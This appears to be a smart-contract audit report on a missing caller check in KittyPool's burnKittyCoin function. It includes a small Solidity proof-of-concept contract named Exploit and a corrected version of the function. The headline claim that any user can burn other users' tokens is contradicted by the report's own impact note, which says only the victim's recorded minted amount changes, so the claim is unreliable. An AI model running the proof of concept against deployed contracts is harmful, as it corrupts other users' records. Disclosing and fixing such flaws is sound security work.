Summary
The vulnerability allows any user to burn tokens from any other user's balance without authorization. This can lead to a significant loss of funds and disrupt the proper functioning of the token ecosystem.
Vulnerability Details
Function: burnKittyCoin
/// Decrements the `kittyCoinMeownted` entry of `_onBehalfOf` and asks the KittyCoin token to burn from the caller.
/// @param _onBehalfOf Account whose `kittyCoinMeownted` entry is reduced.
/// @param _ameownt Amount subtracted from that entry and passed to `i_kittyCoin.burn`.
function burnKittyCoin(address _onBehalfOf, uint256 _ameownt) external {
// NOTE(review): no check relates `msg.sender` to `_onBehalfOf`, so the account whose
// record is reduced and the account named in the burn call can be different.
// Whether this subtraction reverts on underflow depends on the compiler version
// (checked arithmetic from Solidity 0.8.0); the pragma is not shown here.
kittyCoinMeownted[_onBehalfOf] -= _ameownt;
// The burn is requested for `msg.sender`, not `_onBehalfOf`. `burn` is defined
// elsewhere; presumably it removes tokens from the address passed. Confirm.
i_kittyCoin.burn(msg.sender, _ameownt);
}
Impact
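Any user can burn tokens from any other user's balance without authorization. Note that in the function as shown, the entry that is decremented is `kittyCoinMeownted[_onBehalfOf]`, whereas the address passed to `i_kittyCoin.burn` is `msg.sender`; the effect on the other user is therefore on their recorded minted amount, and severity should be assessed on that basis.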
PoC to demonstrate the exploit:
/// Minimal caller used by the report to show that `burnKittyCoin` accepts an arbitrary
/// `_onBehalfOf` address. When invoked through this contract, `msg.sender` inside
/// KittyPool is this contract, so per the `burnKittyCoin` listing the burn is requested
/// against this contract's address while `victim`'s `kittyCoinMeownted` entry is decremented.
contract Exploit {
    // Target pool under test.
    KittyPool pool;

    /// @param _kittyPool Address of the deployed KittyPool instance.
    constructor(address _kittyPool) {
        pool = KittyPool(_kittyPool);
    }

    /// Forwards the call with a third-party address as `_onBehalfOf`.
    /// @param victim Account whose `kittyCoinMeownted` entry is targeted.
    /// @param amount Amount passed through as `_ameownt`.
    function executeExploit(address victim, uint256 amount) external {
        pool.burnKittyCoin(victim, amount);
    }
}
Tools Used
Manual review and Foundry.
Recommendations
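The `burnKittyCoin` function should be modified to ensure that users can only burn their own tokens. Removing the `_onBehalfOf` parameter changes the function's external signature, so any caller that currently passes an address must be updated accordingly.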
/// Burns `_ameownt` KittyCoin for the caller and reduces the caller's own
/// `kittyCoinMeownted` entry by the same amount.
/// @param _ameownt Amount to burn; must not exceed the caller's `kittyCoinMeownted` entry.
function burnKittyCoin(uint256 _ameownt) external {
    // Explicit guard so the failure carries a readable reason string.
    if (kittyCoinMeownted[msg.sender] < _ameownt) {
        revert("Insufficient balance to burn");
    }

    // Both the record update and the burn are keyed on msg.sender, so a caller
    // can only affect its own entry. State is updated before the external call.
    kittyCoinMeownted[msg.sender] -= _ameownt;
    i_kittyCoin.burn(msg.sender, _ameownt);
}